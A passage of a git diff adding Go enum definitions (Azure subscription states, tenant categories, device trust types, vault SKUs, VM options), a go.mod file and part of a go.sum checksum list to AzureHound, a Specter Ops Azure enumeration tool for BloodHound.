"UltraSSD_LRS" +) diff --git a/enums/subscriptionstate.go b/enums/subscriptionstate.go new file mode 100644 index 0000000..c23a17e --- /dev/null +++ b/enums/subscriptionstate.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type SubscriptionState string + +const ( + SubscriptionStateDeleted SubscriptionState = "Deleted" + SubscriptionStateDisabled SubscriptionState = "Disabled" + SubscriptionStateEnabled SubscriptionState = "Enabled" + SubscriptionStatePastDue SubscriptionState = "PastDue" + SubscriptionStateWarned SubscriptionState = "Warned" +) diff --git a/enums/tenantcategory.go b/enums/tenantcategory.go new file mode 100644 index 0000000..aae66f8 --- /dev/null +++ b/enums/tenantcategory.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// Category of the tenant. +type TenantCategory string + +const ( + TenantCategoryHome TenantCategory = "Home" + TenantCategoryManagedBy TenantCategory = "ManagedBy" + TenantCategoryProjectedBy TenantCategory = "ProjectedBy" +) diff --git a/enums/trusttype.go b/enums/trusttype.go new file mode 100644 index 0000000..d9bffe0 --- /dev/null +++ b/enums/trusttype.go @@ -0,0 +1,32 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// Type of trust for the joined device. +type TrustType string + +const ( + // Indicates BYO personal device + TrustTypeWorkplace TrustType = "Workplace" + + // Cloud only joined devices + TrustTypeAzureAD TrustType = "AzureAd" + + // On-premises domain joined devices joined to Azure AD + TrustTypeServerAD TrustType = "ServerAd" +) diff --git a/enums/usage_state.go b/enums/usage_state.go new file mode 100644 index 0000000..9d501af --- /dev/null +++ b/enums/usage_state.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type UsageState string + +const ( + ExceededUsageState UsageState = "Exceeded" + NormalUsageState UsageState = "Normal" +) diff --git a/enums/vaultprovisioningstate.go b/enums/vaultprovisioningstate.go new file mode 100644 index 0000000..2243e91 --- /dev/null +++ b/enums/vaultprovisioningstate.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// Provisioning state of the vault. +type VaultProvisioningState string + +const ( + VaultProvisioningStateRegisteringDns VaultProvisioningState = "RegisteringDns" + VaultProvisioningStateSucceeded VaultProvisioningState = "Succeeded" +) diff --git a/enums/vaultsku.go b/enums/vaultsku.go new file mode 100644 index 0000000..4d6d4fc --- /dev/null +++ b/enums/vaultsku.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// SKU name to specify whether the key vault is a standard vault or a premium vault. +type VaultSku string + +const ( + VaultSkuPremium VaultSku = "premium" + VaultSkuStandard VaultSku = "standard" +) diff --git a/enums/vmdeleteoption.go b/enums/vmdeleteoption.go new file mode 100644 index 0000000..0297df2 --- /dev/null +++ b/enums/vmdeleteoption.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type VMDeleteOption string + +const ( + VMDeleteOptionDelete VMDeleteOption = "Delete" + VMDeleteOptionDetatch VMDeleteOption = "Detatch" +) diff --git a/enums/vmevictionpolicy.go b/enums/vmevictionpolicy.go new file mode 100644 index 0000000..72f4d4e --- /dev/null +++ b/enums/vmevictionpolicy.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type VMEvictionPolicy string + +const ( + VMEvictionPolicyDeallocate VMEvictionPolicy = "Deallocate" + VMEvictionPolicyDelete VMEvictionPolicy = "Delete" +) diff --git a/enums/vmpriority.go b/enums/vmpriority.go new file mode 100644 index 0000000..9454367 --- /dev/null +++ b/enums/vmpriority.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type VMPriority string + +const ( + VMPriorityLow VMPriority = "Low" + VMPriorityRegular VMPriority = "Regular" + VMPrioritySpot VMPriority = "Spot" +) diff --git a/go.mod b/go.mod new file mode 100644 index 0000000..7ac6e40 --- /dev/null +++ b/go.mod @@ -0,0 +1,43 @@ +module github.com/bloodhoundad/azurehound/v2 + +go 1.20 + +require ( + github.com/go-logr/logr v1.2.0 + github.com/gofrs/uuid v4.1.0+incompatible + github.com/golang-jwt/jwt v3.2.2+incompatible + github.com/judwhite/go-svc v1.2.1 + github.com/manifoldco/promptui v0.9.0 + github.com/rs/zerolog v1.26.0 + github.com/spf13/cobra v1.8.1 + github.com/spf13/pflag v1.0.5 + github.com/spf13/viper v1.10.1 + github.com/stretchr/testify v1.7.0 + github.com/youmark/pkcs8 v0.0.0-20201027041543-1326539a0a0a + go.uber.org/mock v0.2.0 + golang.org/x/net v0.23.0 + golang.org/x/sys v0.18.0 +) + +require ( + github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e // indirect + github.com/davecgh/go-spew v1.1.1 // indirect + github.com/fsnotify/fsnotify v1.5.1 // indirect + github.com/hashicorp/hcl v1.0.0 // indirect + github.com/inconshreveable/mousetrap v1.1.0 // indirect + github.com/magiconair/properties v1.8.5 // indirect + github.com/mitchellh/mapstructure v1.4.3 // indirect + github.com/pelletier/go-toml v1.9.4 // indirect + github.com/pmezard/go-difflib v1.0.0 // indirect + github.com/spf13/afero v1.6.0 // indirect + github.com/spf13/cast v1.4.1 // indirect + github.com/spf13/jwalterweatherman v1.1.0 // indirect + github.com/subosito/gotenv v1.2.0 // indirect + golang.org/x/crypto v0.21.0 // indirect + golang.org/x/mod v0.8.0 // indirect + golang.org/x/text v0.14.0 // indirect + golang.org/x/tools v0.6.0 // indirect + gopkg.in/ini.v1 v1.66.2 // indirect + gopkg.in/yaml.v2 v2.4.0 // indirect + gopkg.in/yaml.v3 v3.0.1 // indirect +) diff --git a/go.sum b/go.sum new file mode 100644 index 0000000..caf00fb --- /dev/null +++ b/go.sum @@ -0,0 +1,827 @@ +cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= +cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= +cloud.google.com/go v0.38.0/go.mod h1:990N+gfupTy94rShfmMCWGDn0LpTmnzTp2qbd1dvSRU= +cloud.google.com/go v0.44.1/go.mod h1:iSa0KzasP4Uvy3f1mN/7PiObzGgflwredwwASm/v6AU= +cloud.google.com/go v0.44.2/go.mod h1:60680Gw3Yr4ikxnPRS/oxxkBccT6SA1yMk63TGekxKY= +cloud.google.com/go v0.45.1/go.mod h1:RpBamKRgapWJb87xiFSdk4g1CME7QZg3uwTez+TSTjc= +cloud.google.com/go v0.46.3/go.mod h1:a6bKKbmY7er1mI7TEI4lsAkts/mkhTSZK8w33B4RAg0= +cloud.google.com/go v0.50.0/go.mod h1:r9sluTvynVuxRIOHXQEHMFffphuXHOMZMycpNR5e6To= +cloud.google.com/go v0.52.0/go.mod h1:pXajvRH/6o3+F9jDHZWQ5PbGhn+o8w9qiu/CffaVdO4= +cloud.google.com/go v0.53.0/go.mod h1:fp/UouUEsRkN6ryDKNW/Upv/JBKnv6WDthjR6+vze6M= +cloud.google.com/go v0.54.0/go.mod h1:1rq2OEkV3YMf6n/9ZvGWI3GWw0VoqH/1x2nd8Is/bPc= +cloud.google.com/go v0.56.0/go.mod h1:jr7tqZxxKOVYizybht9+26Z/gUq7tiRzu+ACVAMbKVk= +cloud.google.com/go v0.57.0/go.mod h1:oXiQ6Rzq3RAkkY7N6t3TcE6jE+CIBBbA36lwQ1JyzZs= +cloud.google.com/go v0.62.0/go.mod h1:jmCYTdRCQuc1PHIIJ/maLInMho30T/Y0M4hTdTShOYc= +cloud.google.com/go v0.65.0/go.mod h1:O5N8zS7uWy9vkA9vayVHs65eM1ubvY4h553ofrNHObY= +cloud.google.com/go v0.72.0/go.mod h1:M+5Vjvlc2wnp6tjzE102Dw08nGShTscUx2nZMufOKPI= +cloud.google.com/go v0.74.0/go.mod h1:VV1xSbzvo+9QJOxLDaJfTjx5e+MePCpCWwvftOeQmWk= +cloud.google.com/go v0.78.0/go.mod h1:QjdrLG0uq+YwhjoVOLsS1t7TW8fs36kLs4XO5R5ECHg= +cloud.google.com/go v0.79.0/go.mod h1:3bzgcEeQlzbuEAYu4mrWhKqWjmpprinYgKJLgKHnbb8= +cloud.google.com/go v0.81.0/go.mod h1:mk/AM35KwGk/Nm2YSeZbxXdrNK3KZOYHmLkOqC2V6E0= +cloud.google.com/go v0.83.0/go.mod h1:Z7MJUsANfY0pYPdw0lbnivPx4/vhy/e2FEkSkF7vAVY= +cloud.google.com/go v0.84.0/go.mod h1:RazrYuxIK6Kb7YrzzhPoLmCVzl7Sup4NrbKPg8KHSUM= +cloud.google.com/go v0.87.0/go.mod h1:TpDYlFy7vuLzZMMZ+B6iRiELaY7z/gJPaqbMx6mlWcY= +cloud.google.com/go v0.90.0/go.mod h1:kRX0mNRHe0e2rC6oNakvwQqzyDmg57xJ+SZU1eT2aDQ= +cloud.google.com/go v0.93.3/go.mod h1:8utlLll2EF5XMAV15woO4lSbWQlk8rer9aLOfLh7+YI= +cloud.google.com/go v0.94.1/go.mod h1:qAlAugsXlC+JWO+Bke5vCtc9ONxjQT3drlTTnAplMW4= +cloud.google.com/go v0.97.0/go.mod h1:GF7l59pYBVlXQIBLx3a761cZ41F9bBH3JUlihCt2Udc= +cloud.google.com/go v0.98.0/go.mod h1:ua6Ush4NALrHk5QXDWnjvZHN93OuF0HfuEPq9I1X0cM= +cloud.google.com/go v0.99.0/go.mod h1:w0Xx2nLzqWJPuozYQX+hFfCSI8WioryfRDzkoI/Y2ZA= +cloud.google.com/go/bigquery v1.0.1/go.mod h1:i/xbL2UlR5RvWAURpBYZTtm/cXjCha9lbfbpx4poX+o= +cloud.google.com/go/bigquery v1.3.0/go.mod h1:PjpwJnslEMmckchkHFfq+HTD2DmtT67aNFKH1/VBDHE= +cloud.google.com/go/bigquery v1.4.0/go.mod h1:S8dzgnTigyfTmLBfrtrhyYhwRxG72rYxvftPBK2Dvzc= +cloud.google.com/go/bigquery v1.5.0/go.mod h1:snEHRnqQbz117VIFhE8bmtwIDY80NLUZUMb4Nv6dBIg= +cloud.google.com/go/bigquery v1.7.0/go.mod h1://okPTzCYNXSlb24MZs83e2Do+h+VXtc4gLoIoXIAPc= +cloud.google.com/go/bigquery v1.8.0/go.mod h1:J5hqkt3O0uAFnINi6JXValWIb1v0goeZM77hZzJN/fQ= +cloud.google.com/go/datastore v1.0.0/go.mod h1:LXYbyblFSglQ5pkeyhO+Qmw7ukd3C+pD7TKLgZqpHYE= +cloud.google.com/go/datastore v1.1.0/go.mod h1:umbIZjpQpHh4hmRpGhH4tLFup+FVzqBi1b3c64qFpCk= +cloud.google.com/go/firestore v1.6.1/go.mod h1:asNXNOzBdyVQmEU+ggO8UPodTkEVFW5Qx+rwHnAz+EY= +cloud.google.com/go/pubsub v1.0.1/go.mod h1:R0Gpsv3s54REJCy4fxDixWD93lHJMoZTyQ2kNxGRt3I= +cloud.google.com/go/pubsub v1.1.0/go.mod h1:EwwdRX2sKPjnvnqCa270oGRyludottCI76h+R3AArQw= +cloud.google.com/go/pubsub v1.2.0/go.mod h1:jhfEVHT8odbXTkndysNHCcx0awwzvfOlguIAii9o8iA= +cloud.google.com/go/pubsub v1.3.1/go.mod h1:i+ucay31+CNRpDW4Lu78I4xXG+O1r/MAHgjpRVR+TSU= +cloud.google.com/go/storage v1.0.0/go.mod h1:IhtSnM/ZTZV8YYJWCY8RULGVqBDmpoyjwiyrjsg+URw= +cloud.google.com/go/storage v1.5.0/go.mod h1:tpKbwo567HUNpVclU5sGELwQWBDZ8gh0ZeosJ0Rtdos= +cloud.google.com/go/storage v1.6.0/go.mod h1:N7U0C8pVQ/+NIKOBQyamJIeKQKkZ+mxpohlUTyfDhBk= +cloud.google.com/go/storage v1.8.0/go.mod h1:Wv1Oy7z6Yz3DshWRJFhqM/UCfaWIRTdp0RXyy7KQOVs= +cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9ullr3+Kg0= +dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU= +github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= +github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= +github.com/DataDog/datadog-go v3.2.0+incompatible/go.mod h1:LButxg5PwREeZtORoXG3tL4fMGNddJ+vMq1mwgfaqoQ= +github.com/OneOfOne/xxhash v1.2.2/go.mod h1:HSdplMjZKSmBqAxg5vPj2TmRDmfkzw+cTzAElWljhcU= +github.com/alecthomas/template v0.0.0-20160405071501-a0175ee3bccc/go.mod h1:LOuyumcjzFXgccqObfd/Ljyb9UuFJ6TxHnclSeseNhc= +github.com/alecthomas/template v0.0.0-20190718012654-fb15b899a751/go.mod h1:LOuyumcjzFXgccqObfd/Ljyb9UuFJ6TxHnclSeseNhc= +github.com/alecthomas/units v0.0.0-20151022065526-2efee857e7cf/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0= +github.com/alecthomas/units v0.0.0-20190717042225-c3de453c63f4/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0= +github.com/antihax/optional v1.0.0/go.mod h1:uupD/76wgC+ih3iEmQUL+0Ugr19nfwCT1kdvxnR2qWY= +github.com/armon/circbuf v0.0.0-20150827004946-bbbad097214e/go.mod h1:3U/XgcO3hCbHZ8TKRvWD2dDTCfh9M9ya+I9JpbB7O8o= +github.com/armon/go-metrics v0.0.0-20180917152333-f0300d1749da/go.mod h1:Q73ZrmVTwzkszR9V5SSuryQ31EELlFMUz1kKyl939pY= +github.com/armon/go-metrics v0.3.10/go.mod h1:4O98XIr/9W0sxpJ8UaYkvjk10Iff7SnFrb4QAOwNTFc= +github.com/armon/go-radix v0.0.0-20180808171621-7fddfc383310/go.mod h1:ufUuZ+zHj4x4TnLV4JWEpy2hxWSpsRywHrMgIH9cCH8= +github.com/armon/go-radix v1.0.0/go.mod h1:ufUuZ+zHj4x4TnLV4JWEpy2hxWSpsRywHrMgIH9cCH8= +github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q= +github.com/beorn7/perks v1.0.0/go.mod h1:KWe93zE9D1o94FZ5RNwFwVgaQK1VOXiVxmqh+CedLV8= +github.com/beorn7/perks v1.0.1/go.mod h1:G2ZrVWU2WbWT9wwq4/hrbKbnv/1ERSJQ0ibhJ6rlkpw= +github.com/bgentry/speakeasy v0.1.0/go.mod h1:+zsyZBPWlz7T6j88CTgSN5bM796AkVf0kBD4zp0CCIs= +github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= +github.com/census-instrumentation/opencensus-proto v0.3.0/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= +github.com/cespare/xxhash v1.1.0/go.mod h1:XrSqR1VqqWfGrhpAt58auRo0WTKS1nRRg3ghfAqPWnc= +github.com/cespare/xxhash/v2 v2.1.1/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= +github.com/cespare/xxhash/v2 v2.1.2/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= +github.com/chzyer/logex v1.1.10 h1:Swpa1K6QvQznwJRcfTfQJmTE72DqScAa40E+fbHEXEE= +github.com/chzyer/logex v1.1.10/go.mod h1:+Ywpsq7O8HXn0nuIou7OrIPyXbp3wmkHB+jjWRnGsAI= +github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e h1:fY5BOSpyZCqRo5OhCuC+XN+r/bBCmeuuJtjz+bCNIf8= +github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e/go.mod h1:nSuG5e5PlCu98SY8svDHJxuZscDgtXS6KTTbou5AhLI= +github.com/chzyer/test v0.0.0-20180213035817-a1ea475d72b1 h1:q763qf9huN11kDQavWsoZXJNW3xEE4JJyHa5Q25/sd8= +github.com/chzyer/test v0.0.0-20180213035817-a1ea475d72b1/go.mod h1:Q3SI9o4m/ZMnBNeIyt5eFwwo7qiLfzFZmjNmxjkiQlU= +github.com/circonus-labs/circonus-gometrics v2.3.1+incompatible/go.mod h1:nmEj6Dob7S7YxXgwXpfOuvO54S+tGdZdw9fuRZt25Ag= +github.com/circonus-labs/circonusllhist v0.1.3/go.mod h1:kMXHVDlOchFAehlya5ePtbp5jckzBHf4XRpQvBOLI+I= +github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= +github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= +github.com/cncf/udpa/go v0.0.0-20200629203442-efcf912fb354/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk= +github.com/cncf/udpa/go v0.0.0-20201120205902-5459f2c99403/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk= +github.com/cncf/udpa/go v0.0.0-20210930031921-04548b0d99d4/go.mod h1:6pvJx4me5XPnfI9Z40ddWsdw2W/uZgQLFXToKeRcDiI= +github.com/cncf/xds/go v0.0.0-20210312221358-fbca930ec8ed/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20210805033703-aa0b78936158/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20210922020428-25de7278fc84/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20211001041855-01bcc9b48dfe/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20211011173535-cb28da3451f1/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20211130200136-a8f946100490/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/coreos/go-semver v0.3.0/go.mod h1:nnelYz7RCh+5ahJtPPxZlU+153eP4D4r3EedlOD2RNk= +github.com/coreos/go-systemd/v22 v22.3.2/go.mod h1:Y58oyj3AT4RCenI/lSvhwexgC+NSVTIJ3seZv2GcEnc= +github.com/cpuguy83/go-md2man/v2 v2.0.1/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o= +github.com/cpuguy83/go-md2man/v2 v2.0.4/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o= +github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= +github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= +github.com/envoyproxy/go-control-plane v0.9.7/go.mod h1:cwu0lG7PUMfa9snN8LXBig5ynNVH9qI8YYLbd1fK2po= +github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= +github.com/envoyproxy/go-control-plane v0.9.9-0.20210217033140-668b12f5399d/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= +github.com/envoyproxy/go-control-plane v0.9.9-0.20210512163311-63b5d3c536b0/go.mod h1:hliV/p42l8fGbc6Y9bQ70uLwIvmJyVE5k4iMKlh8wCQ= +github.com/envoyproxy/go-control-plane v0.9.10-0.20210907150352-cf90f659a021/go.mod h1:AFq3mo9L8Lqqiid3OhADV3RfLJnjiw63cSpi+fDTRC0= +github.com/envoyproxy/go-control-plane v0.10.1/go.mod h1:AY7fTTXNdv/aJ2O5jwpxAPOWUZ7hQAEvzN5Pf27BkQQ= +github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= +github.com/envoyproxy/protoc-gen-validate v0.6.2/go.mod h1:2t7qjJNvHPx8IjnBOzl9E9/baC+qXE/TeeyBRzgJDws= +github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4= +github.com/fatih/color v1.9.0/go.mod h1:eQcE1qtQxscV5RaZvpXrrb8Drkc3/DdQ+uUYCNjL+zU= +github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk= +github.com/fsnotify/fsnotify v1.5.1 h1:mZcQUHVQUQWoPXXtuf9yuEXKudkV2sx1E06UadKWpgI= +github.com/fsnotify/fsnotify v1.5.1/go.mod h1:T3375wBYaZdLLcVNkcVbzGHY7f1l/uK5T5Ai1i3InKU= +github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= +github.com/go-gl/glfw v0.0.0-20190409004039-e6da0acd62b1/go.mod h1:vR7hzQXu2zJy9AVAgeJqvqgH9Q5CA+iKCZ2gyEVpxRU= +github.com/go-gl/glfw/v3.3/glfw v0.0.0-20191125211704-12ad95a8df72/go.mod h1:tQ2UAYgL5IevRw8kRxooKSPJfGvJ9fJQFa0TUsXzTg8= +github.com/go-gl/glfw/v3.3/glfw v0.0.0-20200222043503-6f7a984d4dc4/go.mod h1:tQ2UAYgL5IevRw8kRxooKSPJfGvJ9fJQFa0TUsXzTg8= +github.com/go-kit/kit v0.8.0/go.mod h1:xBxKIO96dXMWWy0MnWVtmwkA9/13aqxPnvrjFYMA2as= +github.com/go-kit/kit v0.9.0/go.mod h1:xBxKIO96dXMWWy0MnWVtmwkA9/13aqxPnvrjFYMA2as= +github.com/go-logfmt/logfmt v0.3.0/go.mod h1:Qt1PoO58o5twSAckw1HlFXLmHsOX5/0LbT9GBnD5lWE= +github.com/go-logfmt/logfmt v0.4.0/go.mod h1:3RMwSq7FuexP4Kalkev3ejPJsZTpXXBr9+V4qmtdjCk= +github.com/go-logr/logr v1.2.0 h1:QK40JKJyMdUDz+h+xvCsru/bJhvG0UxvePV0ufL/AcE= +github.com/go-logr/logr v1.2.0/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= +github.com/go-stack/stack v1.8.0/go.mod h1:v0f6uXyyMGvRgIKkXu+yp6POWl0qKG85gN/melR3HDY= +github.com/godbus/dbus/v5 v5.0.4/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA= +github.com/gofrs/uuid v4.1.0+incompatible h1:sIa2eCvUTwgjbqXrPLfNwUf9S3i3mpH1O1atV+iL/Wk= +github.com/gofrs/uuid v4.1.0+incompatible/go.mod h1:b2aQJv3Z4Fp6yNu3cdSllBxTCLRxnplIgP/c0N/04lM= +github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ= +github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q= +github.com/golang-jwt/jwt v3.2.2+incompatible h1:IfV12K8xAKAnZqdXVzCZ+TOjboZ2keLg81eXfW3O+oY= +github.com/golang-jwt/jwt v3.2.2+incompatible/go.mod h1:8pz2t5EyA70fFQQSrl6XZXzqecmYZeUEB8OUGHkxJ+I= +github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= +github.com/golang/groupcache v0.0.0-20190702054246-869f871628b6/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/groupcache v0.0.0-20191227052852-215e87163ea7/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/groupcache v0.0.0-20200121045136-8c9f03a8e57e/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/mock v1.1.1/go.mod 